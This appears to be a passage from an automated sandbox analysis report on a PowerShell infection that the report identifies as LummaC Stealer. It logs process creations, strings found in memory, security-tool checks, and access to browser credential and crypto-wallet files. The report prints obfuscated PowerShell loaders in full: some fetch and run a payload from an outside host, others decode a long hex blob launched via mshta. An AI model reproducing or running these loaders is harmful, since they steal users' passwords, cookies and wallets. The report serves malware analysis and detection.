977F158D34857F26CCC849BE780CB8166B92B610B64C3334FCE35D8F1F478230DAE6C3E86CF93844296A874DEEC71EC4B6694A2AD0018F51C2572849BC046EAC16B467EAB7E6229F03DC638AA510B63A4EBACB32766940CCE7DAF1FCF4F63C76BE1C97A0A09F5362D2D1417AF18230B809ACD1D1F225F4EFC165C55A8BC086346DC9D3715EC116DE095878D1134ADD3C14DC8125EB0D61BEC915BCE4B6FB0EF0A1BDBBE7E3A1F66B8842FC06096AF4E459E3AB4313C4793DCA582EC173E0DAC64534C8B839898A145779CF154674C0AE6F37B54D6B4B13E79735CC2476D5784F96960B10D71A61AB4B67A58B61390249E457FF1005BEB7ACF7A43EE2768E04D4F6FEF537A461B936EE4C0D1808455EBC1927A1E4FC80E91C69F015D288EC31966605CA3FAC7BDFE119B9780C54C172AB01029519B661359B035D477BFE75C71BA1D61A3FD4C7C56A2E76386F7B937A5DDE32CCE6982DEE8E464B2F0D40D595F50EC1801407ADB67F18011AE692B6F0BAA0465ACC91F95CC572304B79D3582A2AEA5F4453DFA1D7E39F5531233C6359F55D33BE19A911559F608653DFD08BBAF79AF2B0917D6EEBE46595756FB41358F33598CCF1E7BE52592115909F9E75477B49B50BA1E60CFBAECFE4AAF4141B07F42C5D596954C405EB172D697BDC63DCEBF8001CA89829E354D2DA20DC9739369899AF53E537DA7B73870831EEFEF889845BBDCF9501654607CF133DCDB9D67420AFC78AA9092BD52A145B944360F0BFECDC7D4932028F16E87771AC1D866EBEC7289803D86ED9904AFDFBFBF5BB048929DB7DB2AC8F63C7EDB203F8E1A174EBE2157AE182E3DBDED3349D83D3D3BC6745E2D5DF17346843FF66DB2BDFC5716E26800477742AF6898AD106316D2237BE4FADEE711172BE9B793AFE378904EC0F53DEE91616E5612EDE3DFB0863A38BAEFACED7F01D988DDCA3304F15DB3A3C71E8CA78B9035B71F7D878AE021C1C142705EC1CBA01FF772D3D880B207B97552700D5D050FE7D8F10D439FF89CEC8E7F26390CBB53F8B2F2E00092A567DDCE5162D4A1597C086F61B398754D709679F2E64B246D6B19AA8BCC08D2AA9B4B391B538D4260FF70CCD920892870858B847D56EAE7A4C64CD4F4C47355F52A842C2647543A4410AB6F0BB68693D79D2DC1A5FAF21241F5C66270CDE2DDD2DEF48DA7DA406D1A0A40075E041A292A5BEAAD267D3D4ED90575F605397391B20AF0B0020D8533E080691845C6A97A37F6782F4C741D9A038423C502F9B4B92EE6E0B4478D1356F52573E4DE57496D7A6B	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command SI Variable:\s9q 'https://cdn1.klipbazyxui.shop/web44.dle';Set-Variable d47 ([Net.WebClient]::New());.(GV xect).Value.(((GV xect).Value\|Get-Member)[6].Name).(((GV xect).Value.(((GV xect).Value\|Get-Member)[6].Name)\|Get-Member\|?{$_.Name-ilike'd'}).Name)((GV xect).Value.(((GV xect).Value\|Get-Member)[6].Name).GetCommandName('In-Exion',$TRUE,$TRUE),[System.Management.Automation.CommandTypes]::Cmdlet)(LS Variable:d47).Value.(((([Net.WebClient]::New()\|Get-Member)\|?{$_.Name-ilike'Dg'}).Name))((Get-Variable s9q -ValueOn))	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function edsx($vxcw){return -split ($vxcw -replace '..', '0x$& ')};$luxv = edsx('a31f9b9673349afe3b35f831884a152adf6ec95559396b5f57d0e445e50347cf7164b0cdc68178f82b54654182eb897b5224571b2475efd970b415458a7af789fc1e6f7abbff5a67ebb9c103a46965e4b312951120ddd87fdaa3dc376f7eb96a063404f5b45999454184a2bba29f2cb28ea21a2da856b254cc0f3bfd7fbcdf179a40af3a54d7a9c674cc8bb41e0c4fd97c7113c648a150674d11ec4ad48559848466fbb95fe08c8526fbfa39058b783166a23ae29f4da0cf61dc080dfc185c0793c8e21a60af85e83785e482739fe2af207c5f01d57e37973b829781481abdce8569691afd4276b4f5a07138f03a1bea59cd80a67d128f1f59b5f08cd14560906adc8fc07eceacd2ca936bf14dd67c0c322a614da8949aae4f3f3dd8c4963919366c68e97be23a086ea39d6e3567274098ae593624acbd21a7aa02cde0168602bea805ba25cab6368f6f34ea5f73de61b4bd7c0ca3ff765fee92a3ff56f66ac139ea96b5a4189ecc7256d4aebe2026c1acafa195958fbe0cf912fee6e99ca63092e010df6b7742f3ac98bbd4b06f22ec971c9ec6e3abcb27953f51df704695b061ac6bec33c1b700dba4bb023b15da076c042faa3a95a07706c8ae7e88553450f62468b509fea6d5cb4350a584fbb2d977f158d34857f26ccc849be780cb8166b92b610b64c3334fce35d8f1f478230dae6c3e86cf93844296a874deec71ec4b6694a2ad0018f51c2572849bc046eac16b467eab7e6229f03dc638aa510b63a4ebacb32766940cce7daf1fcf4f63c76be1c97a0a09f5362d2d1417af18230b809acd1d1f225f4efc165c55a8bc086346dc9d3715ec116de095878d1134add3c14dc8125eb0d61bec915bce4b6fb0ef0a1bdbbe7e3a1f66b8842fc06096af4e459e3ab4313c4793dca582ec173e0dac64534c8b839898a145779cf154674c0ae6f37b54d6b4b13e79735cc2476d5784f96960b10d71a61ab4b67a58b61390249e457ff1005beb7acf7a43ee2768e04d4f6fef537a461b936ee4c0d1808455ebc1927a1e4fc80e91c69f015d288ec31966605ca3fac7bdfe119b9780c54c172ab01029519b661359b035d477bfe75c71ba1d61a3fd4c7c56a2e76386f7b937a5dde32cce6982dee8e464b2f0d40d595f50ec1801407adb67f18011ae692b6f0baa0465acc91f95cc572304b79d3582a2aea5f4453dfa1d7e39f5531233c6359f55d33be19a911559f608653dfd08bbaf79af2b0917d6eebe46595756fb41358f33598ccf1e7be52592115909f9e75477b49b50ba1e60cfbaecfe4aaf4141b07f42c5d596954c405eb172d697bdc63dcebf8001ca89829e354d2da20dc9739369899af53e537da7b73870831eefef889845bbdcf9501654607cf133dcdb9d67420afc78aa9092bd52a145b944360f0bfecdc7d4932028f16e87771ac1d866ebec7289803d86ed9904afdfbfbf5bb048929db7db2ac8f63c7edb203f8e1a174ebe2157ae182e3dbded3349d83d3d3bc6745e2d5df17346843ff66db2bdfc5716e26800477742af6898ad106316d2237be4fadee711172be9b793afe378904ec0f53dee91616e5612ede3dfb0863a38baefaced7f01d988ddca3304f15db3a3c71e8ca78b9035b71f7d878ae021c1c142705ec1cba01ff772d3d880b207b97552700d5d050fe7d8f10d439ff89cec8e7f26390cbb53f8b2f2e00092a567ddce5162d4a1597c086f61b398754d709679f2e64b246d6b19aa8bcc08d2aa9b4b391b538d4260ff70ccd920892870858b847d56eae7a4c64cd4f4c47355f52a842c2647543a4410ab6f0bb68693d79d2dc1a5faf21241f5c66270cde2ddd2def48da7da406d1a0a40075e041a292a5beaad267d3d4ed90575f605397391b20af0b0020d8533e080691845c6a97a37f6782f4c741d9a038423c502f9b4b92ee6e0b4478d1356f52573e4de57496d7a6b
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -w hidden -ep bypass -nop -command si variable:\s9q 'https://cdn1.klipbazyxui.shop/web44.dle';set-variable d47 ([net.webclient]::new());.(gv xect).value.(((gv xect).value\|get-member)[6].name).(((gv xect).value.(((gv xect).value\|get-member)[6].name)\|get-member\|?{$_.name-ilike'd'}).name)((gv xect).value.(((gv xect).value\|get-member)[6].name).getcommandname('in-exion',$true,$true),[system.management.automation.commandtypes]::cmdlet)(ls variable:d47).value.(((([net.webclient]::new()\|get-member)\|?{$_.name-ilike'dg'}).name))((get-variable s9q -valueon))
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function edsx($vxcw){return -split ($vxcw -replace '..', '0x$& ')};$luxv = edsx('a31f9b9673349afe3b35f831884a152adf6ec95559396b5f57d0e445e50347cf7164b0cdc68178f82b54654182eb897b5224571b2475efd970b415458a7af789fc1e6f7abbff5a67ebb9c103a46965e4b312951120ddd87fdaa3dc376f7eb96a063404f5b45999454184a2bba29f2cb28ea21a2da856b254cc0f3bfd7fbcdf179a40af3a54d7a9c674cc8bb41e0c4fd97c7113c648a150674d11ec4ad48559848466fbb95fe08c8526fbfa39058b783166a23ae29f4da0cf61dc080dfc185c0793c8e21a60af85e83785e482739fe2af207c5f01d57e37973b829781481abdce8569691afd4276b4f5a07138f03a1bea59cd80a67d128f1f59b5f08cd14560906adc8fc07eceacd2ca936bf14dd67c0c322a614da8949aae4f3f3dd8c4963919366c68e97be23a086ea39d6e3567274098ae593624acbd21a7aa02cde0168602bea805ba25cab6368f6f34ea5f73de61b4bd7c0ca3ff765fee92a3ff56f66ac139ea96b5a4189ecc7256d4aebe2026c1acafa195958fbe0cf912fee6e99ca63092e010df6b7742f3ac98bbd4b06f22ec971c9ec6e3abcb27953f51df704695b061ac6bec33c1b700dba4bb023b15da076c042faa3a95a07706c8ae7e88553450f62468b509fea6d5cb4350a584fbb2d977f158d34857f26ccc849be780cb8166b92b610b64c3334fce35d8f1f478230dae6c3e86cf93844296a874deec71ec4b6694a2ad0018f51c2572849bc046eac16b467eab7e6229f03dc638aa510b63a4ebacb32766940cce7daf1fcf4f63c76be1c97a0a09f5362d2d1417af18230b809acd1d1f225f4efc165c55a8bc086346dc9d3715ec116de095878d1134add3c14dc8125eb0d61bec915bce4b6fb0ef0a1bdbbe7e3a1f66b8842fc06096af4e459e3ab4313c4793dca582ec173e0dac64534c8b839898a145779cf154674c0ae6f37b54d6b4b13e79735cc2476d5784f96960b10d71a61ab4b67a58b61390249e457ff1005beb7acf7a43ee2768e04d4f6fef537a461b936ee4c0d1808455ebc1927a1e4fc80e91c69f015d288ec31966605ca3fac7bdfe119b9780c54c172ab01029519b661359b035d477bfe75c71ba1d61a3fd4c7c56a2e76386f7b937a5dde32cce6982dee8e464b2f0d40d595f50ec1801407adb67f18011ae692b6f0baa0465acc91f95cc572304b79d3582a2aea5f4453dfa1d7e39f5531233c6359f55d33be19a911559f608653dfd08bbaf79af2b0917d6eebe46595756fb41358f33598ccf1e7be52592115909f9e75477b49b50ba1e60cfbaecfe4aaf4141b07f42c5d596954c405eb172d697bdc63dcebf8001ca89829e354d2da20dc9739369899af53e537da7b73870831eefef889845bbdcf9501654607cf133dcdb9d67420afc78aa9092bd52a145b944360f0bfecdc7d4932028f16e87771ac1d866ebec7289803d86ed9904afdfbfbf5bb048929db7db2ac8f63c7edb203f8e1a174ebe2157ae182e3dbded3349d83d3d3bc6745e2d5df17346843ff66db2bdfc5716e26800477742af6898ad106316d2237be4fadee711172be9b793afe378904ec0f53dee91616e5612ede3dfb0863a38baefaced7f01d988ddca3304f15db3a3c71e8ca78b9035b71f7d878ae021c1c142705ec1cba01ff772d3d880b207b97552700d5d050fe7d8f10d439ff89cec8e7f26390cbb53f8b2f2e00092a567ddce5162d4a1597c086f61b398754d709679f2e64b246d6b19aa8bcc08d2aa9b4b391b538d4260ff70ccd920892870858b847d56eae7a4c64cd4f4c47355f52a842c2647543a4410ab6f0bb68693d79d2dc1a5faf21241f5c66270cde2ddd2def48da7da406d1a0a40075e041a292a5beaad267d3d4ed90575f605397391b20af0b0020d8533e080691845c6a97a37f6782f4c741d9a038423c502f9b4b92ee6e0b4478d1356f52573e4de57496d7a6b	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -w hidden -ep bypass -nop -command si variable:\s9q 'https://cdn1.klipbazyxui.shop/web44.dle';set-variable d47 ([net.webclient]::new());.(gv xect).value.(((gv xect).value\|get-member)[6].name).(((gv xect).value.(((gv xect).value\|get-member)[6].name)\|get-member\|?{$_.name-ilike'd'}).name)((gv xect).value.(((gv xect).value\|get-member)[6].name).getcommandname('in-exion',$true,$true),[system.management.automation.commandtypes]::cmdlet)(ls variable:d47).value.(((([net.webclient]::new()\|get-member)\|?{$_.name-ilike'dg'}).name))((get-variable s9q -valueon))	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: powershell.exe, 00000002.00000002.2132673786.000000000537A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OllyDbg.exe
Source: powershell.exe, 00000002.00000002.2132673786.000000000537A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tcpview.exe
Source: powershell.exe, 00000002.00000002.2132673786.000000000537A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Wireshark.exe
Source: powershell.exe, 00000008.00000002.4459343439.000000000354C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ndows Defender\MsMpeng.exe
Source: powershell.exe, 00000002.00000002.2132673786.000000000537A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: lordpe.exe
Source: powershell.exe, 00000002.00000002.2132673786.000000000537A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: procexp.exe
Source: powershell.exe, 00000002.00000002.2132673786.000000000537A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Procmon.exe
Source: powershell.exe, 00000002.00000002.2132673786.000000000537A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: autoruns.exe
Source: powershell.exe, 00000002.00000002.2132673786.000000000537A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: regmon.exe

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2292, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: powershell.exe, 00000008.00000002.4460160241.000000000356F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: powershell.exe, 00000008.00000002.4460160241.000000000356F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: powershell.exe, 00000008.00000002.4460160241.000000000356F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: powershell.exe, 00000008.00000002.4461034225.00000000035B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Exodus
Source: powershell.exe, 00000008.00000002.4460160241.000000000356F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: powershell.exe, 00000002.00000002.2136742676.0000000007B30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: sqlcolumnencryptionkeystoreprovider

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
